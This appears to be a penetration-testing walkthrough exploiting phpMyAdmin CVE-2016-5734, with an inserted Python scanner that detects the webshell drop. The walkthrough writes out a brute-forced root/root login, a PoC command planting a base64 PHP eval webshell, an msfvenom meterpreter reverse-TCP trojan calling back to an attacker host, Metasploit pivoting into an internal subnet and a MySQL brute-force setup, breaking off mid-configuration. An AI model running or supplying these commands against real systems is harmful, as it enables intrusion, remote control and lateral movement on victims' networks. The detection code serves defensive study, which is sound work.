CVE-2016-5734 remote code execution vulnerability
Affected versions: phpMyAdmin 4.3.0-4.6.2
Found a phpMyAdmin login page, brute-forced it and got the credentials root/root
Used the PoC to get command execution
Wrote a one-line webshell and connected to it with Caidao (China Chopper)
python27 CVE-2016-5734.py -u root -p "root" http://xx.xx.xx.xx:8080 -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4='));"
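As an added defender-side example (not part of the original writeup), the Python below scans captured request bodies for the file_put_contents/base64_decode drop used in the PoC command above, decodes the base64 blob and flags it when the decoded PHP feeds request input into a code-execution sink. It assumes the bodies come from a WAF or reverse-proxy capture; the two sample bodies are constructed, the first carrying the exact payload from the command above.

```python
import base64
import re
from urllib.parse import unquote_plus

# A code-execution sink fed directly from request input: the shape of a PHP one-line webshell.
WEBSHELL_MARKERS = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b",
    re.I,
)
# file_put_contents('<file>', base64_decode('<blob>')) as used in the PoC command above.
B64_WRITE = re.compile(
    r"file_put_contents\s*\(\s*['\"]([^'\"]+)['\"]\s*,\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]",
    re.I,
)

# Constructed sample request bodies (URL-encoded, as a WAF or reverse proxy would log them).
SAMPLE_BODIES = [
    # the webshell drop from the PoC command on this page
    "code=file_put_contents%28%27shell.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4%3D%27%29%29%3B",
    # benign write of a base64 blob with no code-execution sink ("hello world")
    "code=file_put_contents%28%27notes.txt%27%2Cbase64_decode%28%27aGVsbG8gd29ybGQ%3D%27%29%29%3B",
]

def decode_b64(blob):
    """Decode base64 leniently (repair missing padding); return '' if it is not valid base64."""
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""

def inspect_body(raw):
    """Findings for one URL-encoded body: file written plus decoded payload, if it is a webshell."""
    text = unquote_plus(raw)
    findings = []
    for path, blob in B64_WRITE.findall(text):
        decoded = decode_b64(blob)
        hit = WEBSHELL_MARKERS.search(decoded)
        if hit:
            findings.append({"file": path, "decoded": decoded, "marker": hit.group(0)})
    return findings

def scan_bodies(bodies):
    """Scan a batch of captured bodies and tag each finding with the body index."""
    return [dict(f, index=i) for i, body in enumerate(bodies) for f in inspect_body(body)]

if __name__ == "__main__":
    for f in scan_bodies(SAMPLE_BODIES):
        print(f"body {f['index']}: webshell written to {f['file']!r} -> {f['decoded']!r}")
```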
The privileges were fairly low, so generate a trojan with msfvenom
┌──(root㉿kali)-[/home/]
└─ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.189.129 LPORT=9090 -f elf >/root/sa.elf
Upload it to the server through Caidao
Start a listener in Metasploit (exploit/multi/handler)
Run the trojan file on the server; for some reason the command had to be issued several times before it executed
The listener caught the session
There is an internal network segment, so we can pivot into it
Add a route through the pivot host
Scan the internal network
meterpreter > background
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set PORTS 80,8080,21,22,3389,445,1433,3306
PORTS => 80,8080,21,22,3389,445,1433,3306
msf auxiliary(tcp) > set RHOSTS 172.18.0.0/24
RHOSTS => 172.18.0.0/24
msf auxiliary(tcp) > set THREADS 10
THREADS => 10
msf auxiliary(tcp) > exploit
Brute-force port 3306 on 172.18.0.2
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > show options
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts 172.18.0.2
msf6 auxiliary(scanner/mysql/mysql_login) > set rport 3306
msf6 auxiliary(scanner/mysql/mysql_login) > set user_file /home/dzj/user1.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file /home/dzj/pass1.txt